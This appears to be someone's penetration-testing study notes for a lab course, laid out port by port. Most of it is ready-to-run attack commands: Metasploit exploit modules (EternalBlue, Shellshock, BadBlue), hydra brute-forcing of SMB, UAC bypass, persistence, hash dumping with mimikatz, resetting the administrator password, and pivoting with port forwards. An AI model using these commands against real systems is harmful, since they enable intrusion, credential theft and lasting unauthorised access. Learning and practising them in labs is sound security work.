Chittu13/host

  • find / -name local.txt 2> /dev/null  searches the whole filesystem for a file named local.txt (errors suppressed)
  • find -type d -name ".*" 2>/dev/null  lists hidden directories (names starting with a dot) below the current directory

Linux and Windows

Linux exploit

21 FTP server: vsftpd 2.3.4

  • ftp <ip>
    • search vsftpd
    • ftp

22 ssh server

  • ssh root@10.0.1.22
  • nc 10.0.1.22 22  to fetch the banner
    • search libssh_auth_bypass
    • SSH

25, 465, 587 SMTP Haraka smtpd

  • search type:exploit name:haraka
  • SMTP

445, 139 SMB (modern SMB uses 445; originally SMB ran on top of NetBIOS over TCP on 139)

  • search type:exploit name:samba
  • SMB windows
  • enum4linux -a <ip>  save the enumerated users in user.txt for the password attack below
  • enum4linux -a -u admin -p password1 image1
  • hydra -L user.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt <ip> smb
  • You can use the psexec module in Metasploit
  • crackmapexec smb target2.ine.local -u administrator -p pineapple --shares
  • smbclient //target2.ine.local/C$ -U administrator
  • smbclient //<ip>/josh -U josh  if you know the password
  • smbclient //<ip>/pubfiles -N  no password; lists the directories present inside the share "pubfiles"
  • smbclient //127.0.0.1/shawn -U admin
    • it connects to the share like an FTP client
    • shawn is a user
    • -U admin authenticates as admin, i.e. you log in with admin's credentials
  • smbmap -H 127.0.0.1 -u admin -p password1
    • it lists the shares and permissions
  • smbclient -L 127.0.0.1 -N  lists the shares and the server description
  • rpcclient -U "" -N 127.0.0.1  null session; from the rpcclient prompt you can list all users that exist on the Samba server

Windows exploit

  • Full automatic enumeration for Windows: JAWS
    • you must already have access to the target system
    • copy the code from the jaws-enum.ps1 file and save it locally as jaws-enum.ps1
    • upload the file to the target system from meterpreter: upload /root/jaws-enum.ps1
    • powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt
    • when execution finishes, the output is saved in JAWS-Enum.txt

162 Simple Network Management Protocol (SNMP)

  • search type:exploit psexec
  • SNMP

445 Windows MS17-010 SMB vulnerability (EternalBlue)

5985 or 5986 (WinRM vuln) ---> service banner: http Microsoft HTTPAPI httpd 2.0 SSDP/UPnP

  • search type:auxiliary winrm
  • WinRM

8080 Apache Tomcat

  • search type:exploit tomcat
  • Tomcat

3389 RDP service

  • xfreerdp /u:administrator /p:password123 /v:<targetip>

    • search rdp platform:windows
    • use post/windows/manage/enable_rdp
    • RDP_enable
    • For more information
    • RDP2
    • RDP3

Windows privilege escalation

  • 1. Bypassing UAC with UACMe (User Account Control)

Windows post exploit

  • search migrate
  • use post/windows/manage/migrate
  • exploit

post exploit in windows

  • finding the currently logged-in user
    • use post/windows/gather/enum_logged_on_users and run it (exploit)

Establishing persistence on Windows

  • search platform:windows persistence
  • Persistence Connection
  • To check the permissions of a user
    • search win_privs
  • use exploit/windows/winrm/winrm_script_exec

1 check the privileges of the current user

  • search win_privs
  • set the session id and run it (exploit)

2 find the currently logged-in user

  • search enum_logged_on
  • set the session id and run it; here you get the SID of the currently logged-in user

3 check whether the target system is a VM

  • search checkvm
  • use post/windows/gather/checkvm
  • set the session id and run it

4 programs installed on the target system

  • search enum_applications
  • use post/windows/gather/enum_applications
  • set the session id

5 detect antivirus installed on the target system

  • search type:post platform:windows enum_av
  • use post/windows/gather/enum_av_excluded
  • set the session id

6 check which domain the target system is part of

  • search enum_computer
  • use post/windows/gather/enum_computers

7 check for installed patches

  • search enum_patches
  • use post/windows/gather/enum_patches
  • set the session id
  • if you get an error, migrate to another process (list processes with ps)

8 check for any shares on the target system

  • search enum_shares
  • use post/windows/gather/enum_shares
  • set the session id

9 checking or enabling the RDP service

  • xfreerdp /u:administrator /p:password123 /v:<targetip>
    • search rdp platform:windows
    • use post/windows/manage/enable_rdp
  • now you can change the password for the user; in my case I have access to the administrator account
  • so I have a meterpreter session running in the background
  • so use shell
  • change the password
  • net user administrator password123
    • you have changed the administrator's password so that we can log in over RDP using xfreerdp with this login
    • RDP_enable
    • For more information
    • RDP2
    • RDP3

Dumping hashes with mimikatz

Linux post exploit

  • use post/linux/gather/hashdump
  • set session 1
  • exploit
  • use loot  lists what was collected

Web

/gettime.cgi Bash CVE-2014-6271 vulnerability (Shellshock)

  • use exploit/multi/http/apache_mod_cgi_bash_env_exec
    • set TARGETURI /gettime.cgi
  • Shellshock

Apache Tomcat 8080

  • search type:exploit tomcat
  • tomcat

80 XODA running

80 http HttpFileServer httpd 2.3 for windows server

  • search rejetto

80 BadBlue httpd 2.7 (mimikatz)

  • search badblue 2.7
  • use exploit/windows/http/badblue_passthru
  • Mimikatz

Windows commands

  • currently logged-on user
    • query user
    • it is a Windows command
    • or you can use net users
    • net user <user_name>  for more information on that user
    • use post/windows/gather/enum_logged_on_users
    • net localgroup
    • net localgroup administrators
  • To see the current privileges
    • whoami /priv
  • route print  display the routing table
  • Display all devices seen on the local network (ARP cache)
    • arp -a
  • Display open ports on the target system
    • netstat -ano
  • Display the state of the firewall
    • netsh firewall show state
    • or netsh advfirewall firewall help  opens the help
      • netsh advfirewall firewall dump
      • netsh advfirewall show allprofiles
  • running services
    • tasklist /SVC
  • display scheduled tasks
    • schtasks /query /fo LIST /v

linux

  • hostname
  • cat /etc/issue  distribution and version
  • cat /etc/*release  release details
  • uname -a  full kernel and architecture info
  • uname -r  kernel release
  • env  environment variables
  • lscpu  CPU details
  • free -h  memory usage
  • df -h  disk usage
  • df -ht ext4  disk usage, ext4 filesystems only
  • lsblk | grep sd  block devices
  • dpkg -l  installed packages
  • useradd -m -s /bin/bash royal  create user royal with a home directory and bash shell
  • groups  groups of the current user
  • groups bob  groups of user bob
  • usermod -aG root bob  add bob to the root group
  • lastlog  last login of every user

pivoting

  • Adding a route to target 1 in meterpreter
    • Note: you must already have a meterpreter session on target 1
    • run autoroute -s <target_ip_1>.0/20
    • run autoroute -p  checks that the route was added
    • background the meterpreter session so that we can do the port scan
    • search portscan, use the tcp scan: use auxiliary/scanner/portscan/tcp
      • set RHOSTS <target_ip_2> and set PORTS 1-100
      • If you want to know what service version is running on a port on target 2 you need a port forward, because we need nmap and Metasploit can't do it
      • portfwd add -l 1234 -p 80 -r <target_ip_2>
        • -l 1234  the local port you are setting for the port forward; any port not used by another service will do
        • -p 80  the actual port running on target 2 that you want to scan further
        • Note: this port forward must be done inside the meterpreter session
      • After adding the port forward in meterpreter, open a new terminal and run the nmap scan against port 1234
      • nmap -sV -O -T4 -p 1234 localhost
        • for example, you will see that the BadBlue service is running on port 80
        • go back to meterpreter and search BadBlue
        • use exploit/windows/http/badblue_passthru
          • set payload windows/meterpreter/bind_tcp
          • set RHOSTS <target_ip_2>
          • exploit
          • sysinfo, getuid
